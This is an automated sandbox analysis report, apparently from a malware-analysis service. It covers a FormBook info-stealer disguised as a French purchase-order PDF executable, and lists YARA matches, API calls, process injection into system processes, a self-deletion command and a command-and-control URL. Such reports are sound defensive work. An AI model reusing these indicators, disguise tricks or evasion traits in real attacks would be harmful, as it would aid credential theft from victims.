Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: WWAHost.exe, 0000000A.00000002.477885883.0000000003D32000.00000004.00000001.sdmp	String found in binary or memory: https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Nouveau bon de commande. 3007021_pdf.exe

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_004181C0 NtCreateFile,	2_2_004181C0
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_00418270 NtReadFile,	2_2_00418270
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_004182F0 NtClose,	2_2_004182F0
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_004183A0 NtAllocateVirtualMemory,	2_2_004183A0
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041817B NtCreateFile,	2_2_0041817B
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_004181BA NtCreateFile,	2_2_004181BA
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041826B NtReadFile,	2_2_0041826B
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_004182EA NtClose,	2_2_004182EA
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041839C NtAllocateVirtualMemory,	2_2_0041839C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659710 NtQueryInformationToken,LdrInitializeThunk,	10_2_03659710
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659FE0 NtCreateMutant,LdrInitializeThunk,	10_2_03659FE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659780 NtMapViewOfSection,LdrInitializeThunk,	10_2_03659780
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659660 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_03659660
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659650 NtQueryValueKey,LdrInitializeThunk,	10_2_03659650
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659A50 NtCreateFile,LdrInitializeThunk,	10_2_03659A50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036596E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_036596E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036596D0 NtCreateKey,LdrInitializeThunk,	10_2_036596D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659540 NtReadFile,LdrInitializeThunk,	10_2_03659540
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_03659910
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036595D0 NtClose,LdrInitializeThunk,	10_2_036595D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036599A0 NtCreateSection,LdrInitializeThunk,	10_2_036599A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_03659860
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659840 NtDelayExecution,LdrInitializeThunk,	10_2_03659840
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659760 NtOpenProcess,	10_2_03659760
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659770 NtSetInformationFile,	10_2_03659770
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0365A770 NtOpenThread,	10_2_0365A770
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659730 NtQueryVirtualMemory,	10_2_03659730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659B00 NtSetValueKey,	10_2_03659B00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0365A710 NtOpenProcessToken,	10_2_0365A710
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036597A0 NtUnmapViewOfSection,	10_2_036597A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0365A3B0 NtGetContextThread,	10_2_0365A3B0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659670 NtQueryInformationProcess,	10_2_03659670
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659A20 NtResumeThread,	10_2_03659A20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659A00 NtProtectVirtualMemory,	10_2_03659A00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659610 NtEnumerateValueKey,	10_2_03659610
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659A10 NtQuerySection,	10_2_03659A10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659A80 NtOpenDirectoryObject,	10_2_03659A80
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659560 NtWriteFile,	10_2_03659560
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659950 NtQueueApcThread,	10_2_03659950
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659520 NtWaitForSingleObject,	10_2_03659520
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0365AD30 NtSetContextThread,	10_2_0365AD30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036595F0 NtQueryInformationFile,	10_2_036595F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036599D0 NtCreateProcessEx,	10_2_036599D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0365B040 NtSuspendThread,	10_2_0365B040
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03659820 NtEnumerateKey,	10_2_03659820
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036598F0 NtReadVirtualMemory,	10_2_036598F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036598A0 NtWriteVirtualMemory,	10_2_036598A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_028982F0 NtClose,	10_2_028982F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_02898270 NtReadFile,	10_2_02898270
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_028983A0 NtAllocateVirtualMemory,	10_2_028983A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_028981C0 NtCreateFile,	10_2_028981C0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_028982EA NtClose,	10_2_028982EA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289826B NtReadFile,	10_2_0289826B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289839C NtAllocateVirtualMemory,	10_2_0289839C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_028981BA NtCreateFile,	10_2_028981BA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289817B NtCreateFile,	10_2_0289817B

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_004012FB	2_2_004012FB
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041BB8C	2_2_0041BB8C
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041CBB7	2_2_0041CBB7
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_00402D88	2_2_00402D88
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041B6EB	2_2_0041B6EB
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E2B28	10_2_036E2B28
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E1FF1	10_2_036E1FF1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DDBD2	10_2_036DDBD2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364EBB0	10_2_0364EBB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03636E30	10_2_03636E30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E2EF7	10_2_036E2EF7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E22AE	10_2_036E22AE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E1D55	10_2_036E1D55
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03610D20	10_2_03610D20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03634120	10_2_03634120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361F900	10_2_0361F900
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E2D07	10_2_036E2D07
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362D5E0	10_2_0362D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E25DD	10_2_036E25DD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642581	10_2_03642581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DD466	10_2_036DD466
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1002	10_2_036D1002
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362841F	10_2_0362841F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E28EC	10_2_036E28EC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036420A0	10_2_036420A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E20A8	10_2_036E20A8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362B090	10_2_0362B090
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289CBB7	10_2_0289CBB7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289B6EB	10_2_0289B6EB
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_02882FB0	10_2_02882FB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_02888C60	10_2_02888C60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_02882D88	10_2_02882D88
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_02882D90	10_2_02882D90

Source: C:\Windows\SysWOW64\WWAHost.exe

Code function: String function: 0361B150 appears 35 times

Source: Nouveau bon de commande. 3007021_pdf.exe, 00000000.00000000.201502923.00000000005E2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTRACEENABLEIN.exe: vs Nouveau bon de commande. 3007021_pdf.exe
Source: Nouveau bon de commande. 3007021_pdf.exe	Binary or memory string: OriginalFilename vs Nouveau bon de commande. 3007021_pdf.exe
Source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.294055772.0000000001ED6000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameWWAHost.exej% vs Nouveau bon de commande. 3007021_pdf.exe
Source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.291591359.0000000000F92000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTRACEENABLEIN.exe: vs Nouveau bon de commande. 3007021_pdf.exe
Source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292904199.0000000001BDF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Nouveau bon de commande. 3007021_pdf.exe
Source: Nouveau bon de commande. 3007021_pdf.exe	Binary or memory string: OriginalFilenameTRACEENABLEIN.exe: vs Nouveau bon de commande. 3007021_pdf.exe

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@12/4

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nouveau bon de commande. 3007021_pdf.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_01

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Nouveau bon de commande. 3007021_pdf.exe	Virustotal: Detection: 60%
Source: Nouveau bon de commande. 3007021_pdf.exe	Metadefender: Detection: 34%
Source: Nouveau bon de commande. 3007021_pdf.exe	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process created: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process created: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Nouveau bon de commande. 3007021_pdf.exe

Static file information: File size 1327104 > 1048576

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x143600

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: WWAHost.pdb source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.293934813.0000000001E20000.00000040.00000001.sdmp
Source:	Binary string: WWAHost.pdbUGP source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.293934813.0000000001E20000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292665175.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292665175.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041C9C6 push es; ret	2_2_0041C9C7
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041B3B5 push eax; ret	2_2_0041B408
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041B46C push eax; ret	2_2_0041B472
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041B402 push eax; ret	2_2_0041B408
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041B40B push eax; ret	2_2_0041B472
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 2_2_0041CF8E pushfd ; iretd	2_2_0041CF8F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0366D0D1 push ecx; ret	10_2_0366D0E4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289B3B5 push eax; ret	10_2_0289B408
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289C9C6 push es; ret	10_2_0289C9C7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289CF8E pushfd ; iretd	10_2_0289CF8F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289BF5B push cs; ret	10_2_0289BF61
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289B40B push eax; ret	10_2_0289B472
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289B402 push eax; ret	10_2_0289B408
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0289B46C push eax; ret	10_2_0289B472

Source: initial sample

Static PE information: section name: .text entropy: 7.77818810762

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
